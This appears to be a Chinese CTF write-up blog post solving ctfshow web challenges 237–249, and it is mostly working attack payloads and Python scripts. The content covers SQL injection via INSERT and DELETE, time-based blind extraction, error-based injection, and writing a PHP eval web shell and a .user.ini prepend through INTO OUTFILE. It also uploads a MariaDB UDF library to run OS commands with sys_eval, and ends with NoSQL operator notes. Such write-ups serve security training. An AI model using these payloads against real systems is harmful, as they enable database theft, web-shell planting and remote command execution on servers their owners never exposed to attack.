username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())-- &password=\
// 返回 banlist,ctfshow_user,flaga

username=,username=(select to_base64(b) from (select 1,2 as b,3 union select * from flaga limit 1,1)a)-- &password=\

username=,username=(select hex(b) from (select 1,2 as b,3 union select * from flaga limit 1,1)a)-- &password=\

insert

237

$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

由于他会将所有的数据都展示出来,所以我们可以构造修改插入的数据进行注入:

username=1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#&password=2

这样一来执行的SQL语句就变为了:

insert into ctfshow_user(username,pass) value('1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#','2');

插入的原密码处的数据就变为了查询语句返回的内容,就可以直接查询我们想要查询的内容了。

username=1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#&password=2
username=1',(select group_concat(column_name) from information_schema.columns where table_name="flag"))#&password=2
username=1',(select flagass23s3 from flag))#&password=2
username=1',(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database()));#
password=2
查数据——无列名查询
1',(select b from (select 1,2 as b,3 union select * from flag limit 1,1)a));#

238

$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";
//过滤空格
// 括号包裹
username=1',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))#&password=2

username=1',(select(group_concat(column_name))from(information_schema.columns)where(table_name="flagb")))#&password=2

username=1',(select(flag)from(flagb)))#&password=2

239

$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";
//过滤空格

//information_schema表不能用了,参照web235的无列名注入。
username=1',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())));#

// *被过滤,只能去猜列名

username=1',(select(flag)from(flagbb)))#&password=2

240

$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

//过滤空格 or sys mysql
import requests

url = 'http://a47c98f4-72a4-4558-bf93-c9082f8d0491.challenge.ctf.show/api/insert.php'
flag_url = 'http://a47c98f4-72a4-4558-bf93-c9082f8d0491.challenge.ctf.show/api/?desc=&page=1&limit=1000'

# web240: information_schema, mysql and sys are all filtered, so the flag table
# name cannot be looked up.  It is "flag" followed by five letters from {a, b},
# which is only 32 candidates: insert a row whose password is the flag column of
# each candidate and check the listing for "ctfshow{".
data = {'username': '', 'password': '2'}

for n in range(32):
    # The five bits of n select the letters: 0 -> 'a', 1 -> 'b'
    # (flagaaaaa ... flagbbbbb).
    table = 'flag' + ''.join('ab'[int(bit)] for bit in format(n, '05b'))
    data['username'] = f"1',(select(flag)from({table})))#"
    requests.post(url, data)
    listing = requests.get(flag_url).text
    if 'ctfshow{' in listing:
        print(table)
        break

delete

241

$sql = "delete from  ctfshow_user where id = {$id}";
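from time import sleep

import requests

# web241: time-based blind injection through the DELETE's WHERE clause.  "-1"
# matches no id and the if() yields 0 on both branches, so no row is deleted,
# but sleep(0.05) runs once per row the WHERE is evaluated on (same per-row
# accumulation as web233), hence the 0.9 s timeout.
url = 'http://8eb8267d-06ca-4001-83e3-a9cadbe414f0.challenge.ctf.show/api/delete.php'
i = 0
data = {'id': ''}
flag = ''

while True:
    # Binary search for the ASCII value of the i-th character.
    start = 32
    tail = 127
    i += 1
    while start < tail:
        mid = (start + tail) >> 1
        # Earlier stages of the same attack, kept for reference:
        # payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
        # payload = 'select group_concat(column_name) from information_schema.columns where table_name="flag"'
        payload = 'select flag from flag'
        data['id'] = f'-1 or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.05),0)#'
        try:
            requests.post(url, data, timeout=0.9)
        except requests.exceptions.Timeout:
            # Only a timeout means the sleep branch ran (char > mid); other
            # network errors propagate instead of being recorded as a bit.
            start = mid + 1
        else:
            tail = mid
        # Let the server finish any still-running sleeps before the next
        # probe, so they do not delay it and cause a false positive.
        sleep(1)
    if start != 32:
        flag += chr(start)
        print(flag)
    else:
        # Never moved off the lower bound: no character here, flag complete.
        break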

file

242

//备份表
$sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";
SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]

"OPTION"参数为可选参数选项,其可能的取值有:

FIELDS TERMINATED BY '字符串':设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是"\t"。

FIELDS ENCLOSED BY '字符':设置字符来括住字段的值,只能为单个字符。默认情况下不使用任何符号。

FIELDS OPTIONALLY ENCLOSED BY '字符':设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。

FIELDS ESCAPED BY '字符':设置转义字符,只能为单个字符。默认值为"\"。

LINES STARTING BY '字符串':设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。

LINES TERMINATED BY '字符串':设置每行数据结尾的字符,可以为单个或多个字符。默认值是"\n"。

可以写马的参数有:

FIELDS TERMINATED BY 'str'
LINES STARTING BY 'str'
LINES TERMINATED BY 'str'
filename=1.php' LINES STARTING BY "<?php eval($_POST[cmd]);?>";#

243

//备份表
$sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";

//过滤了php
/*
这题在上一题的基础上增加了过滤,把 php 过滤了。

这样的话没办法直接写入 .php 文件了。结合文件上传的知识,/dump/ 下还有一个 index.php 文件,那么我们就可以写一个 .user.ini 文件,通过 auto_prepend_file / auto_append_file 把包含恶意代码的其他文件包含到同目录的 PHP 文件中,也能达到写马的目的。前提是 PHP 以 CGI/FastCGI(如 php-fpm)方式运行,.user.ini 才会被读取,并且同目录要有可访问的 .php 文件——这里正好是 /dump/index.php。

可以先上传 .user.ini 文件,这里在每行开头加上换行符避免与前面插入的内容混在一起。
然后上传包含恶意代码的文件,然后访问/dump/index.php就可以执行命令了。
*/

filename=.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d312e6a70670a6175746f5f617070656e645f66696c653d312e6a70670a;#

filename=1.jpg' FIELDS TERMINATED BY 0x3c3f706870206576616c28245f504f53545b315d293b3f3e;#

error

更多见 报错注入.md

244

$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";
api/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),2)%23

api/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

api/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),0x7e),1)%23

api/?id=1' and updatexml(1,concat(0x7e,(select flag from ctfshow_flag),0x7e),1)%23

回显长度有限制,使用mid、left、right、substr等函数截取
api/?id=1' and updatexml(1,concat(0x7c,mid((select flag from ctfshow_flag),1,30)),1) %23

api/?id=1' and updatexml(1,concat(0x7c,mid((select flag from ctfshow_flag),31,30)),1) %23

245

$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";

//过滤updatexml
1' or extractvalue(rand(),concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())));--+

1' or extractvalue(rand(),concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database()and table_name='ctfshow_flagsa')));--+

1' or extractvalue(rand(),concat(0x7e,(select group_concat(flag1)from ctfshow_flagsa)));--+

1' or extractvalue(rand(),concat(0x7e,substr((select group_concat(flag1)from ctfshow_flagsa),1,25)));--+

1' or extractvalue(rand(),concat(0x7e,substr((select group_concat(flag1)from ctfshow_flagsa),26,25)));--+

246

$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";
//过滤updatexml extractvalue
1' and (select 1 from (select count(*),concat((select (table_name) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a);--+

1' and (select 1 from (select count(*),concat((select (column_name) from information_schema.columns where table_schema=database() and table_name="ctfshow_flags" limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a);--+

1' and (select 1 from (select count(*),concat((select flag2 from ctfshow_flags),floor(rand(0)*2))x from information_schema.tables group by x)a);--+

247

$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";
//过滤updatexml extractvalue floor
1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),ceil(rand(0)*2))x from information_schema.tables group by x)a) %23

1' and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema=database() limit 3,1),ceil(rand(0)*2))x from information_schema.tables group by x)a) %23

1' and (select 1 from (select count(*),concat((select `flag?` from ctfshow_flagsa),ceil(rand(0)*2))x from information_schema.tables group by x)a) %23

' union select 1,count(*),concat((select `flag?` from ctfshow_flagsa limit 0,1),ceil(rand(0)*2))a from information_schema.columns group by a-- -

eval

248

//UDF注入
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'; //导入udf函数(前提:当前数据库用户有 FILE 权限、secure_file_priv 未限制写入路径,且 mysqld 对 plugin 目录可写;udf.so 还必须与服务端的架构和 MariaDB/MySQL 版本匹配)
import requests

# web248 target: UDF injection via stacked queries on the id parameter.
base_url="http://8df48e3a-006f-4c37-b9d9-efbb9927edf2.challenge.ctf.show:8080/api/"
# Hex chunks of the shared object, filled below; one staging file per chunk.
payload = []
# Base names of the staging files written into the plugin directory.
text = ["a", "b", "c", "d", "e"]
udf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
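# Split the hex-encoded .so into 5000-character chunks; one request cannot
# carry the whole file.  The chunk count is derived from the data instead of
# the hard-coded 21510 the original used.
chunk = 5000
payload = [udf[i:i + chunk] for i in range(0, len(udf), chunk)]
if len(payload) > len(text):
    # zip() below would silently drop the surplus chunks and produce a
    # truncated, unloadable udf.so.
    raise ValueError(f"udf needs {len(payload)} chunks but only {len(text)} file names are available")
# The loader request concatenates all five files, so every name must exist
# even when the data needs fewer chunks (an empty chunk writes an empty file).
payload += [''] * (len(text) - len(payload))

p = dict(zip(text, payload))

# Stage each chunk as <name>.txt in the plugin directory (needs FILE privilege
# and a writable plugin dir; secure_file_priv must not forbid the path).
for t in text:
    url = base_url+"?id=';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t)
    r = requests.get(url)
    print(r.status_code)

# Reassemble the chunks server-side into udf.so.
next_url = base_url+"?id=';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'--+&page=1&limit=10"
rn = requests.get(next_url)

# Register the UDF, then run the command through it.
udf_url=base_url+"?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+"
r=requests.get(udf_url)
nn_url = base_url+"?id=';select sys_eval('cat /flag.*');--+&page=1&limit=10"
rnn = requests.get(nn_url)
print(rnn.text)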
import requests

# web248 target (second approach); every stacked statement is appended to ?id=.
url: str = 'http://c4cfac67-eec1-4378-ac1b-75c52840f816.challenge.ctf.show:8080/api/?id='
code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
# Split the hex-encoded .so into 128-character pieces; a slice past the end is
# clamped by Python, so no explicit min() is needed.
codes = [code[i:i + 128] for i in range(0, len(code), 128)]


def commit_payload(payload: str):
    """Run one stacked SQL statement through the id parameter (web248).

    The injected id closes the original quote with ``0'``, appends
    *payload* as a second statement and comments out the rest of the
    query with ``-- A``.  The HTTP response is discarded; results are
    read back later through the listing endpoint.
    """
    injected = f'''0';{payload};-- A'''
    requests.get(url + injected)


# First run only: create the staging table that receives the .so bytes.
# sql='''create table temp(data longblob)'''


# Empty the staging table so a previous partial upload cannot corrupt this one.
commit_payload('''delete from temp''')

# Insert the first chunk.
commit_payload('''insert into temp(data) values (0x{})'''.format(codes[0]))

# Append the remaining chunks by concatenation, in order.
for k in range(1, len(codes)):
    commit_payload('''update temp set data = concat(data,0x{})'''.format(codes[k]))

# 10.3.18-MariaDB
# Dump the assembled blob as udf.so into the plugin directory.  Requires FILE
# privilege, a plugin dir writable by mysqld and a permissive secure_file_priv
# (inferred from the dumpfile path; not shown on this page).
commit_payload('''select data from temp into dumpfile '/usr/lib/mariadb/plugin/udf.so\'''')

# Register the user-defined function from the freshly written library.
commit_payload('''create function sys_eval returns string soname 'udf.so\'''')

# Execute the command and park its output in a column the listing shows.
commit_payload(
    '''update ctfshow_user set pass=(select sys_eval('cat /flag.????'))''')

# Read the result back: strip the trailing "?id=" and call the listing API.
r = requests.get(url[:-4] + '?page=1&limit=10')
print(r.text)

249


$gt : >
$lt : <
$gte: >=
$lte: <=
$ne : !=、<>
$in : in
$nin: not in
$all: all 
$or:or
$not: 反匹配(1.3.3及以上版本)
模糊查询用正则式:db.customer.find({'name': {'$regex':'.*s.*'} })
/**
* : 范围查询 { "age" : { "$gte" : 2 , "$lte" : 21}}
* : $ne { "age" : { "$ne" : 23}}
* : $lt { "age" : { "$lt" : 23}}
*/

//查询age = 22的记录
db.userInfo.find({"age": 22});
//相当于:select * from userInfo where age = 22;
//查询age > 22的记录
db.userInfo.find({age: {$gt: 22}});
//相当于:select * from userInfo where age > 22;

这题的话提示了flag在flag中,相当于找flag的值,正常肯定是id=flag,但是会返回error。
PHP 的 intval() 对非空数组返回 1,所以传数组 ?id[]=flag 应该能通过 intval 的校验,而原始的数组值会被带入后面的 Mongo 查询条件,造成 NoSQL 注入。

posted @ 2021-10-24 14:34  NwN  阅读(385)  评论(1)    收藏  举报